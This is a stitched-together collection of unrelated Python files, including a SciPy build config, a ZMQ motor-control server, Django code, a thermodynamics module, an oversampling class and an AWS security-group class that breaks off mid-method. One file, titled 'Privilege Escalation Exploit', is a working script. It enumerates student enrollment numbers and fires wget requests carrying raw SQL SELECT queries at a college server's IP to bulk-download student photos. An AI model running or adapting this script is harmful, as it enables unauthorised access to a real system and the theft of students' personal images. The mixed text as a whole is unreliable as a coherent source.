    from numpy.distutils.system_info import get_info, BlasNotFoundError
    config = Configuration('odr', parent_package, top_path)

    libodr_files = ['d_odr.f',
                    'd_mprec.f',
                    'dlunoc.f']

    # Prefer an optimized BLAS; otherwise warn and fall back to the
    # bundled reference routines (d_lpkbls.f).
    blas_info = get_info('blas_opt')
    if blas_info:
        libodr_files.append('d_lpk.f')
    else:
        warnings.warn(BlasNotFoundError.__doc__)
        libodr_files.append('d_lpkbls.f')

    odrpack_src = [join('odrpack', x) for x in libodr_files]
    config.add_library('odrpack', sources=odrpack_src)

    sources = ['__odrpack.c']
    # pop() removes these keys so the remaining blas_info entries can be
    # forwarded untouched as **blas_info below.
    libraries = ['odrpack'] + blas_info.pop('libraries', [])
    include_dirs = ['.'] + blas_info.pop('include_dirs', [])
    config.add_extension('__odrpack',
                         sources=sources,
                         libraries=libraries,
                         include_dirs=include_dirs,
                         depends=(['odrpack.h'] + odrpack_src),
                         **blas_info
                         )

    config.add_data_dir('tests')
    return config


if __name__ == '__main__':
    # Allow building this subpackage standalone via numpy.distutils.
    from numpy.distutils.core import setup

    setup(**configuration(top_path='').todict())

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import zmq
from zmq.eventloop import ioloop as ioloop_mod
import zmqdecorators
import time

SERVICE_NAME = "urpobot.motor"
SERVICE_PORT = 7575
SIGNALS_PORT = 7576

# How long to wait for new commands before stopping automatically
COMMAND_GRACE_TIME = 0.250


class motorserver(zmqdecorators.service):
    """ZMQ service that relays speed commands to a motor controller board
    over a serial port.

    A periodic watchdog stops the motors whenever no command has arrived
    within COMMAND_GRACE_TIME seconds, so a crashed client cannot leave
    the robot driving.
    """

    def __init__(self, service_name, service_port, serialport):
        super(motorserver, self).__init__(service_name, service_port)
        self.serial_port = serialport
        self.input_buffer = ""
        # Watch the serial fd on the IOLoop so incoming bytes are handled
        # event-driven instead of via a reader thread.
        self.evthandler = ioloop_mod.IOLoop.instance().add_handler(self.serial_port.fileno(), self.handle_serial_event, ioloop_mod.IOLoop.instance().READ)
        self.last_command_time = time.time()
        # NOTE: "reveived" is a historical typo for "received"; kept as-is
        # since renaming is out of scope for a documentation pass.
        self.pcb = ioloop_mod.PeriodicCallback(self.check_data_reveived, COMMAND_GRACE_TIME)
        self.pcb.start()

    def check_data_reveived(self, *args):
        """Watchdog tick: stop the motors if commands have gone stale."""
        if (time.time() - self.last_command_time > COMMAND_GRACE_TIME):
            self._setspeeds(0,0)

    def _setspeeds(self, m1speed, m2speed):
        """Write both motor speeds to the board as S<m1><m2> hex command."""
        # Mask to 16 bits so negative speeds become two's-complement hex.
        self.serial_port.write("S%04X%04X\n" % ((m1speed & 0xffff), (m2speed & 0xffff)))

    @zmqdecorators.method()
    def setspeeds(self, resp, m1speed, m2speed):
        """RPC entry point: set motor speeds and refresh the watchdog."""
        self.last_command_time = time.time()
        #print("Got speeds %s,%s" % (m1speed, m2speed))
        self._setspeeds(m1speed, m2speed)
        # TODO: actually handle ACK/NACK somehow (we need to read it from the serialport but we can't block while waiting for it...)
        resp.send("ACK")

    def handle_serial_event(self, fd, events):
        """IOLoop callback: accumulate serial bytes until a CRLF-terminated
        message is complete, then dispatch it to ``message_received``."""
        # Copied from arbus that was thread based
        if not self.serial_port.inWaiting():
            # Don't try to read if there is no data, instead sleep (yield) a bit
            time.sleep(0)
            return
        data = self.serial_port.read(1)
        if len(data) == 0:
            return
        #print("DEBUG: data=%s" % data)

        # Put the data into the input buffer and check for CRLF
        self.input_buffer += data
        # Trim prefix NULLs and linebreaks
        self.input_buffer = self.input_buffer.lstrip(chr(0x0) + "\r\n")
        #print "input_buffer=%s" % repr(self.input_buffer)
        if (    len(self.input_buffer) > 1
            and self.input_buffer[-2:] == "\r\n"):
            # Got a message, parse it (sans the CRLF) and empty the buffer
            self.message_received(self.input_buffer[:-2])
            self.input_buffer = ""

    def message_received(self, message):
        """Handle one complete line from the board (currently a no-op)."""
        #print("DEBUG: msg=%s" % message)
        try:
            # Currently we have no incoming messages from this board
            pass
        except Exception as e:
            print "message_received exception: Got exception %s" % repr(e)
            # Ignore indexerrors, they just mean we could not parse the command
            pass
        pass

    def cleanup(self):
        """Service shutdown hook: make sure the motors are stopped."""
        print("Cleanup called")
        self._setspeeds(0,0)

    def run(self):
        """Start serving (blocks in the zmqdecorators service loop)."""
        print("Starting motorserver")
        super(motorserver, self).run()



if __name__ == "__main__":
    # Usage: script.py <serial-device>; opens the board at 115200 baud
    # with a short timeout so reads never block the IOLoop for long.
    import serial
    import sys,os
    port = serial.Serial(sys.argv[1], 115200, xonxoff=False, timeout=0.01)
    instance = motorserver(SERVICE_NAME, SERVICE_PORT, port)
    instance.run()

from rest_framework import serializers
from . import models


class Invoice(serializers.ModelSerializer):
    """Serializer exposing the listed Invoice model fields over the REST API."""

    class Meta:
        model = models.Invoice
        fields = (
            'id', 'name', 'additional_infos', 'owner',
            'creation_date', 'update_date',
        )

"""Basic thermodynamic calculations for pickaxe."""

from typing import Union

import pint
from equilibrator_api import (
    Q_,
    ComponentContribution,
    Reaction,
    default_physiological_ionic_strength,
    default_physiological_p_h,
    default_physiological_p_mg,
    default_physiological_temperature,
)
from equilibrator_api.phased_reaction import PhasedReaction
from equilibrator_assets.compounds import Compound
from equilibrator_assets.local_compound_cache import LocalCompoundCache
from equilibrator_cache.compound_cache import CompoundCache
from pymongo import MongoClient
from sqlalchemy import create_engine

from minedatabase.pickaxe import Pickaxe


class Thermodynamics:
    """Class to calculate thermodynamics of Pickaxe runs.

    Thermodynamics allows for the calculation of:
        1) Standard ∆G' of formation
        2) Standard ∆G'o of reaction
        3) Physiological ∆G'm of reaction
        4) Adjusted ∆G' of reaction

    eQuilibrator objects can also be obtained from r_ids and c_ids.

    Parameters
    ----------
    mongo_uri: str
        URI of the mongo database.
    client: MongoClient
        Connection to Mongo.
    CC: ComponentContribution
        eQuilibrator Component Contribution object to calculate ∆G with.
    lc: LocalCompoundCache
        The local compound cache to generate eQuilibrator compounds from.
    """

    def __init__(
        self,
    ):
        # Mongo params (populated by load_mongo)
        self.mongo_uri = None
        self.client = None
        self._core = None

        # eQ params (lc/_water populated by load_thermo_from_*)
        self.CC = ComponentContribution()
        self.lc = None
        self._water = None

    def load_mongo(self, mongo_uri: Union[str, None] = None):
        """Connect to MongoDB and cache a handle to the ``core`` database.

        Parameters
        ----------
        mongo_uri : Union[str, None]
            URI of the mongo database; defaults to localhost:27017.
        """
        if mongo_uri:
            self.mongo_uri = mongo_uri
            self.client = MongoClient(mongo_uri)
        else:
            self.mongo_uri = "localhost:27017"
            self.client = MongoClient()

        self._core = self.client["core"]

    def _all_dbs_loaded(self):
        """Return True if both Mongo and the eQuilibrator cache are loaded,
        otherwise print a reminder and return False."""
        if self.client and self._core and self.lc:
            return True
        else:
            print("Load connection to Mongo and eQuilibrator local cache.")
            return False

    def _eq_loaded(self):
        """Return True if the eQuilibrator local cache is loaded, otherwise
        print a reminder and return False."""
        if self.lc:
            return True
        else:
            print("Load eQulibrator local cache.")
            return False

    def _reset_CC(self):
        """reset CC back to defaults"""
        self.CC.p_h = default_physiological_p_h
        self.CC.p_mg = default_physiological_p_mg
        self.CC.temperature = default_physiological_temperature
        self.CC.ionic_strength = default_physiological_ionic_strength

    def load_thermo_from_postgres(
        self, postgres_uri: str = "postgresql:///eq_compounds"
    ) -> None:
        """Load a LocalCompoundCache from a postgres uri for equilibrator.

        Parameters
        ----------
        postgres_uri : str, optional
            uri of the postgres DB to use, by default "postgresql:///eq_compounds"
        """
        self.lc = LocalCompoundCache()
        self.lc.ccache = CompoundCache(create_engine(postgres_uri))

        # "O" is the SMILES string for water.
        self._water = self.lc.get_compounds("O")

    def load_thermo_from_sqlite(
        self, sqlite_filename: str = "compounds.sqlite"
    ) -> None:
        """Load a LocalCompoundCache from a sqlite file for equilibrator.

        compounds.sqlite can be generated through LocalCompoundCache's method
        generate_local_cache_from_default_zenodo

        Parameters
        ----------
        sqlite_filename: str
            filename of the sqlite file to load.
        """
        self.lc = LocalCompoundCache()
        self.lc.load_cache(sqlite_filename)

        # "O" is the SMILES string for water.
        self._water = self.lc.get_compounds("O")

    def get_eQ_compound_from_cid(
        self, c_id: str, pickaxe: Pickaxe = None, db_name: str = None
    ) -> Union[Compound, None]:
        """Get an equilibrator compound for a given c_id from the core.

        Attempts to retrieve a compound from the core or a specified db_name.

        Parameters
        ----------
        c_id : str
            compound ID for MongoDB lookup of a compound.
        pickaxe : Pickaxe
            pickaxe object to look for the compound in, by default None.
        db_name : str
            Database to look for compound in before core database, by default None.

        Returns
        -------
        equilibrator_assets.compounds.Compound
            eQuilibrator Compound
        """
        # Find locally in pickaxe
        compound_smiles = None
        if pickaxe:
            if c_id in pickaxe.compounds:
                compound_smiles = pickaxe.compounds[c_id]["SMILES"]
            else:
                return None

        # Find in mongo db
        elif self._all_dbs_loaded():
            if db_name:
                compound = self.client[db_name].compounds.find_one(
                    {"_id": c_id}, {"SMILES": 1}
                )
                if compound:
                    compound_smiles = compound["SMILES"]

            # No cpd smiles from database name
            if not compound_smiles:
                compound = self._core.compounds.find_one({"_id": c_id}, {"SMILES": 1})
                if compound:
                    compound_smiles = compound["SMILES"]

        # No compound_smiles at all; "*" marks wildcard atoms, which
        # eQuilibrator cannot handle.
        if not compound_smiles or "*" in compound_smiles:
            return None
        else:
            eQ_compound = self.lc.get_compounds(
                compound_smiles, bypass_chemaxon=True, save_empty_compounds=True
            )
            return eQ_compound

    def standard_dg_formation_from_cid(
        self, c_id: str, pickaxe: Pickaxe = None, db_name: str = None
    ) -> Union[float, None]:
        """Get standard ∆Gfo for a compound.

        Parameters
        ----------
        c_id : str
            Compound ID to get the ∆Gf for.
        pickaxe : Pickaxe
            pickaxe object to look for the compound in, by default None.
        db_name : str
            Database to look for compound in before core database, by default None.

        Returns
        -------
        Union[float, None]
            ∆Gf'o for a compound, or None if unavailable.
        """
        eQ_cpd = self.get_eQ_compound_from_cid(c_id, pickaxe, db_name)
        if not eQ_cpd:
            return None
        # standard_dg_formation returns a sequence; the value is first.
        dgf = self.CC.standard_dg_formation(eQ_cpd)
        dgf = dgf[0]

        return dgf

    def get_eQ_reaction_from_rid(
        self, r_id: str, pickaxe: Pickaxe = None, db_name: str = None
    ) -> Union[PhasedReaction, None]:
        """Get an eQuilibrator reaction object from an r_id.

        Parameters
        ----------
        r_id : str
            Reaction id to get object for.
        pickaxe : Pickaxe
            pickaxe object to look for the compound in, by default None.
        db_name : str
            Database to look for reaction in.

        Returns
        -------
        PhasedReaction
            eQuilibrator reactiono to calculate ∆Gr with.
        """
        if pickaxe:
            if r_id in pickaxe.reactions:
                reaction_info = pickaxe.reactions[r_id]
            else:
                return None
        elif db_name:
            mine = self.client[db_name]
            reaction_info = mine.reactions.find_one({"_id": r_id})
            if not reaction_info:
                return None
        else:
            return None

        reactants = reaction_info["Reactants"]
        products = reaction_info["Products"]

        # Build "coeff c_id + ..." strings for each side; entries are
        # (coefficient, compound_id) pairs.
        lhs = " + ".join(f"{r[0]} {r[1]}" for r in reactants)
        rhs = " + ".join(f"{p[0]} {p[1]}" for p in products)
        reaction_string = " => ".join([lhs, rhs])

        compounds = set([r[1] for r in reactants])
        compounds.update(tuple(p[1] for p in products))

        eQ_compound_dict = {
            c_id: self.get_eQ_compound_from_cid(c_id, pickaxe, db_name)
            for c_id in compounds
        }

        # Bail out if any participant could not be resolved.
        if not all(eQ_compound_dict.values()):
            return None

        # Presumably the hash below is the c_id of water; ensure water is
        # available for parsing when it is not already a participant.
        if "X73bc8ef21db580aefe4dbc0af17d4013961d9d17" not in compounds:
            eQ_compound_dict["water"] = self._water

        eq_reaction = Reaction.parse_formula(eQ_compound_dict.get, reaction_string)

        return eq_reaction

    def physiological_dg_prime_from_rid(
        self, r_id: str, pickaxe: Pickaxe = None, db_name: str = None
    ) -> Union[pint.Measurement, None]:
        """Calculate the ∆Gm' of a reaction.

        Parameters
        ----------
        r_id : str
            ID of the reaction to calculate.
        pickaxe : Pickaxe
            pickaxe object to look for the compound in, by default None.
        db_name : str
            MINE the reaction is found in.

        Returns
        -------
        pint.Measurement
            The calculated ∆G'm.
        """
        eQ_reaction = self.get_eQ_reaction_from_rid(r_id, pickaxe, db_name)
        if not eQ_reaction:
            return None
        dGm_prime = self.CC.physiological_dg_prime(eQ_reaction)

        return dGm_prime

    def standard_dg_prime_from_rid(
        self, r_id: str, pickaxe: Pickaxe = None, db_name: str = None
    ) -> Union[pint.Measurement, None]:
        """Calculate the ∆G'o of a reaction.

        Parameters
        ----------
        r_id : str
            ID of the reaction to calculate.
        pickaxe : Pickaxe
            pickaxe object to look for the compound in, by default None.
        db_name : str
            MINE the reaction is found in.

        Returns
        -------
        pint.Measurement
            The calculated ∆G'o.
        """
        eQ_reaction = self.get_eQ_reaction_from_rid(r_id, pickaxe, db_name)
        if not eQ_reaction:
            return None
        dG0_prime = self.CC.standard_dg_prime(eQ_reaction)

        return dG0_prime

    def dg_prime_from_rid(
        self,
        r_id: str,
        pickaxe: Pickaxe = None,
        db_name: str = None,
        p_h: Q_ = default_physiological_p_h,
        p_mg: Q_ = default_physiological_p_mg,
        ionic_strength: Q_ = default_physiological_ionic_strength,
    ) -> Union[pint.Measurement, None]:
        """Calculate the ∆G' of a reaction.

        Parameters
        ----------
        r_id : str
            ID of the reaction to calculate.
        pickaxe : Pickaxe
            pickaxe object to look for the compound in, by default None.
        db_name : str
            MINE the reaction is found in.
        p_h : Q_
            pH of system.
        p_mg: Q_
            pMg of the system.
        ionic_strength: Q_
            ionic strength of the system.

        Returns
        -------
        pint.Measurement
            The calculated ∆G'.
        """
        eQ_reaction = self.get_eQ_reaction_from_rid(r_id, pickaxe, db_name)
        if not eQ_reaction:
            return None

        # Temporarily override the CC conditions for this calculation...
        self.CC.p_h = p_h
        self.CC.p_mg = p_mg
        self.CC.ionic_strength = ionic_strength

        dG_prime = self.CC.dg_prime(eQ_reaction)

        # ...then restore physiological defaults so later calls are unaffected.
        self._reset_CC()

        return dG_prime

import os

#Decoration Starts
print """
+=============================================================+
||		  Privilege Escalation Exploit	             ||
||   +===================================================+   ||
||   |    _   _    _    ____ _  __    ____  ___ _____    |   ||
||   |   | | | |  / \  / ___| |/ /   |  _ \|_ _|_   _|   |   ||
||   |   | |_| | / _ \| |   | ' /    | |_) || |  | |     |   ||
||   |   |  _  |/ ___ \ |___| . \    |  _ < | |  | |     |   ||
||   |   |_| |_/_/   \_\____|_|\_\   |_| \_\___| |_|     |   ||
||   |                                                   |   ||
||   +===================================================+   ||
||   ~ by Yadnyawalkya Tale (yadnyawalkyatale@gmail.com) ~   ||
+=============================================================+
"""
#Decoration Ends

# Class according to Year Input 
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()

if year_input == 1:
	year_choice = 1300000 #Final Year
elif year_input == 2:
	year_choice = 1400000 #Third Year
elif year_input == 3:
	year_choice = 1500000 #Second Year
elif year_input == 4:
	year_choice = 1600000 #First Year

# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()

if class_input == 1:
	class_choice = 1000 #Automobile Department
elif class_input == 2:
	class_choice = 2000 #Civil Department
elif class_input == 3:
	class_choice = 3000 #ComputerScience Department
elif class_input == 4:
	class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
	class_choice = 5000 #ETC Department
elif class_input == 6:
	class_choice = 8000 #Electrial Department
elif class_input == 7:
	class_choice = 6000 #Mechanical Department

startflag = year_choice + class_choice 		#For eg. Start @ 1303000
if class_input == 7:
	endflag = year_choice + class_choice + 70 +128	#Special Arrangement for Mechanical ;)
else:
	endflag = year_choice + class_choice + 70 	#For eg. End @ 1303070

os.system("mkdir ritphotos")

decoration="="
while startflag < endflag:
    startflag = startflag + 1
    cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
    os.system(cmd1)
    decoration = "=" + decoration
    print "{0}".format(decoration)
print "100%\tPlease Wait..."

pstartflag = year_choice + class_choice + 150000
if class_input == 7:
	pendflag = year_choice + class_choice + 40 + 150000 #For All branches
else:
	pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;)

while pstartflag < pendflag:
    pstartflag = pstartflag + 1
    cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
    os.system(cmd2)

print "Downloading Images Complete..."
os.system("find ritphotos -size  0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images

import codecs

# Demo: the Python 3 str/bytes split and the two equivalent ways to decode.
unicode_string = "Hello Python 3 String"

bytes_object = b"Hello Python 3 Bytes"

print(unicode_string, type(unicode_string))

print(bytes_object, type(bytes_object))



#decode to unicode_string

# str(bytes, encoding, errors) is equivalent to bytes.decode(...).
ux = str(object=bytes_object, encoding="utf-8", errors="strict")

print(ux, type(ux))

ux = bytes_object.decode(encoding="utf-8", errors="strict")

print(ux, type(ux))


# Hex-encode a bytes object; the result is itself bytes (b'...').
hex_bytes = codecs.encode(b"Binary Object", "hex_codec")


def string_to_bytes(text):
    """Return the UTF-8 bytes of *text* as a binary-literal string ('0b...')."""
    as_int = int.from_bytes(text.encode(), byteorder='big')
    return bin(as_int)

def bytes_to_string(btext):
    """Decode an integer (as produced by string_to_bytes) back into text.

    e.g. int('0b110100001100101011011000110110001101111', 2) -> 'hello'
    """
    n_bytes = (btext.bit_length() + 7) // 8  # round up to whole bytes
    return btext.to_bytes(n_bytes, byteorder='big').decode()

def char_to_bytes(char):
    """Return the code point of a single character as a '0b...' string."""
    code_point = ord(char)
    return "0b" + format(code_point, "b")

def encodes(text):
    """Hex-encode *text*: UTF-8 bytes rendered as a lowercase hex string."""
    raw = text.encode(encoding="utf-8")
    # hex_codec yields bytes; decode to return a plain str.
    return codecs.encode(raw, "hex_codec").decode("utf-8")

def decodes(text=None):
    """Inverse of encodes(): turn a hex string back into the original text.

    :param text: hex-encoded string as produced by encodes(). When omitted
        (the historical no-arg signature was an unimplemented stub) the
        function returns None, preserving backward compatibility.
    :return: decoded unicode string, or None when no input is given.
    """
    if text is None:
        return None
    # bytes.fromhex is the stdlib inverse of the "hex_codec" encoding
    # used by encodes().
    return bytes.fromhex(text).decode("utf-8")


if __name__ == "__main__":

    print( encodes("walla") )  # demo: hex-encode a sample string



﻿"""Class to perform random over-sampling."""

# Authors: Guillaume Lemaitre <g.lemaitre58@gmail.com>
#          Christos Aridas
# License: MIT

from collections.abc import Mapping
from numbers import Real

import numpy as np
from scipy import sparse
from sklearn.utils import check_array, check_random_state
from sklearn.utils import _safe_indexing
from sklearn.utils.sparsefuncs import mean_variance_axis

from .base import BaseOverSampler
from ..utils import check_target_type
from ..utils import Substitution
from ..utils._docstring import _random_state_docstring
from ..utils._validation import _deprecate_positional_args


@Substitution(
    sampling_strategy=BaseOverSampler._sampling_strategy_docstring,
    random_state=_random_state_docstring,
)
class RandomOverSampler(BaseOverSampler):
    """Class to perform random over-sampling.

    Object to over-sample the minority class(es) by picking samples at random
    with replacement. The bootstrap can be generated in a smoothed manner.

    Read more in the :ref:`User Guide <random_over_sampler>`.

    Parameters
    ----------
    {sampling_strategy}

    {random_state}

    shrinkage : float or dict, default=None
        Parameter controlling the shrinkage applied to the covariance matrix
        when a smoothed bootstrap is generated. The options are:

        - if `None`, a normal bootstrap will be generated without perturbation.
          It is equivalent to `shrinkage=0` as well;
        - if a `float` is given, the shrinkage factor will be used for all
          classes to generate the smoothed bootstrap;
        - if a `dict` is given, the shrinkage factor will be specific for each
          class. The key corresponds to the targeted class and the value is
          the shrinkage factor.

        The value of the shrinkage parameter needs to be higher than or equal
        to 0.

        .. versionadded:: 0.8

    Attributes
    ----------
    sampling_strategy_ : dict
        Dictionary containing the information to sample the dataset. The keys
        correspond to the class labels from which to sample and the values
        are the number of samples to sample.

    sample_indices_ : ndarray of shape (n_new_samples,)
        Indices of the samples selected.

        .. versionadded:: 0.4

    shrinkage_ : dict or None
        The per-class shrinkage factor used to generate the smoothed bootstrap
        sample. When `shrinkage=None` a normal bootstrap will be generated.

        .. versionadded:: 0.8

    n_features_in_ : int
        Number of features in the input dataset.

        .. versionadded:: 0.9

    See Also
    --------
    BorderlineSMOTE : Over-sample using the borderline-SMOTE variant.

    SMOTE : Over-sample using SMOTE.

    SMOTENC : Over-sample using SMOTE for continuous and categorical features.

    SMOTEN : Over-sample using the SMOTE variant specifically for categorical
        features only.

    SVMSMOTE : Over-sample using SVM-SMOTE variant.

    ADASYN : Over-sample using ADASYN.

    KMeansSMOTE : Over-sample applying a clustering before to oversample using
        SMOTE.

    Notes
    -----
    Supports multi-class resampling by sampling each class independently.
    Supports heterogeneous data as object array containing string and numeric
    data.

    When generating a smoothed bootstrap, this method is also known as Random
    Over-Sampling Examples (ROSE) [1]_.

    .. warning::
       Since smoothed bootstrap are generated by adding a small perturbation
       to the drawn samples, this method is not adequate when working with
       sparse matrices.

    References
    ----------
    .. [1] G Menardi, N. Torelli, "Training and assessing classification
       rules with imbalanced data," Data Mining and Knowledge
       Discovery, 28(1), pp.92-122, 2014.

    Examples
    --------
    >>> from collections import Counter
    >>> from sklearn.datasets import make_classification
    >>> from imblearn.over_sampling import \
RandomOverSampler # doctest: +NORMALIZE_WHITESPACE
    >>> X, y = make_classification(n_classes=2, class_sep=2,
    ... weights=[0.1, 0.9], n_informative=3, n_redundant=1, flip_y=0,
    ... n_features=20, n_clusters_per_class=1, n_samples=1000, random_state=10)
    >>> print('Original dataset shape %s' % Counter(y))
    Original dataset shape Counter({{1: 900, 0: 100}})
    >>> ros = RandomOverSampler(random_state=42)
    >>> X_res, y_res = ros.fit_resample(X, y)
    >>> print('Resampled dataset shape %s' % Counter(y_res))
    Resampled dataset shape Counter({{0: 900, 1: 900}})
    """

    @_deprecate_positional_args
    def __init__(
        self,
        *,
        sampling_strategy="auto",
        random_state=None,
        shrinkage=None,
    ):
        super().__init__(sampling_strategy=sampling_strategy)
        self.random_state = random_state
        self.shrinkage = shrinkage

    def _check_X_y(self, X, y):
        # dtype=None and force_all_finite=False let heterogeneous
        # (string + numeric) and NaN-containing data pass through,
        # matching the "allow_nan"/"string" tags in _more_tags().
        y, binarize_y = check_target_type(y, indicate_one_vs_all=True)
        X, y = self._validate_data(
            X,
            y,
            reset=True,
            accept_sparse=["csr", "csc"],
            dtype=None,
            force_all_finite=False,
        )
        return X, y, binarize_y

    def _fit_resample(self, X, y):
        random_state = check_random_state(self.random_state)

        # Normalize `shrinkage` into a per-class dict (or None for a
        # plain, unsmoothed bootstrap).
        if isinstance(self.shrinkage, Real):
            self.shrinkage_ = {
                klass: self.shrinkage for klass in self.sampling_strategy_
            }
        elif self.shrinkage is None or isinstance(self.shrinkage, Mapping):
            self.shrinkage_ = self.shrinkage
        else:
            raise ValueError(
                f"`shrinkage` should either be a positive floating number or "
                f"a dictionary mapping a class to a positive floating number. "
                f"Got {repr(self.shrinkage)} instead."
            )

        if self.shrinkage_ is not None:
            # Every class that will be resampled needs a shrinkage factor.
            missing_shrinkage_keys = (
                self.sampling_strategy_.keys() - self.shrinkage_.keys()
            )
            if missing_shrinkage_keys:
                raise ValueError(
                    f"`shrinkage` should contain a shrinkage factor for "
                    f"each class that will be resampled. The missing "
                    f"classes are: {repr(missing_shrinkage_keys)}"
                )

            for klass, shrink_factor in self.shrinkage_.items():
                if shrink_factor < 0:
                    raise ValueError(
                        f"The shrinkage factor needs to be >= 0. "
                        f"Got {shrink_factor} for class {klass}."
                    )

            # smoothed bootstrap imposes to make numerical operation; we need
            # to be sure to have only numerical data in X
            try:
                X = check_array(X, accept_sparse=["csr", "csc"], dtype="numeric")
            except ValueError as exc:
                raise ValueError(
                    "When shrinkage is not None, X needs to contain only "
                    "numerical data to later generate a smoothed bootstrap "
                    "sample."
                ) from exc

        # Start from a copy of the original data; bootstrap samples for
        # each class are appended below.
        X_resampled = [X.copy()]
        y_resampled = [y.copy()]

        # Original sample indices first, then every bootstrap draw, so
        # sample_indices_ maps each output row back to an input row.
        sample_indices = range(X.shape[0])
        for class_sample, num_samples in self.sampling_strategy_.items():
            target_class_indices = np.flatnonzero(y == class_sample)
            bootstrap_indices = random_state.choice(
                target_class_indices,
                size=num_samples,
                replace=True,
            )
            sample_indices = np.append(sample_indices, bootstrap_indices)
            if self.shrinkage_ is not None:
                # generate a smoothed bootstrap with a perturbation
                n_samples, n_features = X.shape
                # Bandwidth-style smoothing constant; see the ROSE
                # reference [1]_ in the class docstring.
                smoothing_constant = (4 / ((n_features + 2) * n_samples)) ** (
                    1 / (n_features + 4)
                )
                if sparse.issparse(X):
                    _, X_class_variance = mean_variance_axis(
                        X[target_class_indices, :],
                        axis=0,
                    )
                    # in-place sqrt to avoid an extra allocation
                    X_class_scale = np.sqrt(X_class_variance, out=X_class_variance)
                else:
                    X_class_scale = np.std(X[target_class_indices, :], axis=0)
                smoothing_matrix = np.diagflat(
                    self.shrinkage_[class_sample] * smoothing_constant * X_class_scale
                )
                # Gaussian noise scaled per feature, added to the drawn rows.
                X_new = random_state.randn(num_samples, n_features)
                X_new = X_new.dot(smoothing_matrix) + X[bootstrap_indices, :]
                if sparse.issparse(X):
                    X_new = sparse.csr_matrix(X_new, dtype=X.dtype)
                X_resampled.append(X_new)
            else:
                # generate a bootstrap
                X_resampled.append(_safe_indexing(X, bootstrap_indices))

            y_resampled.append(_safe_indexing(y, bootstrap_indices))

        self.sample_indices_ = np.array(sample_indices)

        if sparse.issparse(X):
            X_resampled = sparse.vstack(X_resampled, format=X.format)
        else:
            X_resampled = np.vstack(X_resampled)
        y_resampled = np.hstack(y_resampled)

        return X_resampled, y_resampled

    def _more_tags(self):
        return {
            "X_types": ["2darray", "string", "sparse", "dataframe"],
            "sample_indices": True,
            "allow_nan": True,
        }

# Source Generated with Decompyle++
# File: session_recording.pyc (Python 2.5)

from __future__ import absolute_import
from pushbase.session_recording_component import FixedLengthSessionRecordingComponent

class SessionRecordingComponent(FixedLengthSessionRecordingComponent):
    """Session recording that arms/triggers recording on record-button
    release rather than on press."""

    def __init__(self, *a, **k):
        # BUG FIX (decompiler artifact): keyword arguments were forwarded
        # as `**a` (the positional-args tuple, a TypeError at runtime);
        # forward the actual keyword dict `**k`.
        super(SessionRecordingComponent, self).__init__(*a, **k)
        # Only trigger on release if the button is not already held down.
        self.set_trigger_recording_on_release(not (self._record_button.is_pressed))

    def set_trigger_recording_on_release(self, trigger_recording):
        # Remember whether releasing the record button should start recording.
        self._should_trigger_recording = trigger_recording

    def _on_record_button_pressed(self):
        # Pressing alone does nothing; recording is triggered on release.
        pass

    def _on_record_button_released(self):
        if self._should_trigger_recording:
            self._trigger_recording()
        # Re-arm for the next press/release cycle.
        self._should_trigger_recording = True


# Generated by Django 2.1 on 2018-08-26 00:54

from django.db import migrations, models


class Migration(migrations.Migration):
    """Repoint each file/image field's upload_to at the
    '<Model>/bytes/filename/mimetype' storage layout."""

    dependencies = [
        ('model_filefields_example', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='book',
            name='cover',
            field=models.ImageField(blank=True, null=True, upload_to='model_filefields_example.BookCover/bytes/filename/mimetype'),
        ),
        migrations.AlterField(
            model_name='book',
            name='index',
            field=models.FileField(blank=True, null=True, upload_to='model_filefields_example.BookIndex/bytes/filename/mimetype'),
        ),
        migrations.AlterField(
            model_name='book',
            name='pages',
            field=models.FileField(blank=True, null=True, upload_to='model_filefields_example.BookPages/bytes/filename/mimetype'),
        ),
        migrations.AlterField(
            model_name='sounddevice',
            name='instruction_manual',
            field=models.FileField(blank=True, null=True, upload_to='model_filefields_example.SoundDeviceInstructionManual/bytes/filename/mimetype'),
        ),
    ]

""" -*- coding: utf-8 -*- """

from python2awscli import bin_aws
from python2awscli.error import AWSNotFound, ParseError, AWSDuplicate
from python2awscli import must


class BaseSecurityGroup(object):
    """Idempotent model of one EC2 Security Group, driven via the aws CLI.

    Construction looks the group up (creating it when absent) and then
    converges its ingress/egress rules toward the requested ones.
    """

    def __init__(self, name, region, vpc, description, inbound=None, outbound=None):
        """
        :param name: String, name of SG
        :param region: String, AWS region
        :param vpc: String, ID of the VPC this SG belongs to (used as --vpc-id)
        :param description: String
        :param inbound: List of dicts, ingress IP Permissions that should exist
        :param outbound: List of dicts, egress IP Permissions that should exist
        """
        self.id = None
        self.name = name
        self.region = region
        self.vpc = vpc
        self.description = description
        self.IpPermissions = []
        self.IpPermissionsEgress = []
        self.owner = None
        self.changed = False
        try:
            self._get()
        except AWSNotFound:
            self._create()
        self._merge_rules(must.be_list(inbound), self.IpPermissions)
        self._merge_rules(must.be_list(outbound), self.IpPermissionsEgress, egress=True)
        if self.changed:
            # Re-read so the cached rule lists reflect what AWS now has.
            self._get()

    def _break_out(self, existing):
        """
        Undo AWS's rule flattening so we can do simple 'if rule in existing' logic later.
        :param existing: List of SG rules as dicts.
        :return: List of SG rules as dicts.
        """
        spool = list()
        for rule in existing:
            # One copy per CIDR range, with the group pairs emptied...
            for ip in rule['IpRanges']:
                copy_of_rule = rule.copy()
                copy_of_rule['IpRanges'] = [ip]
                copy_of_rule['UserIdGroupPairs'] = []
                spool.append(copy_of_rule)
            # ...and one copy per SG pair, with the IP ranges emptied.
            for group in rule['UserIdGroupPairs']:
                copy_of_rule = rule.copy()
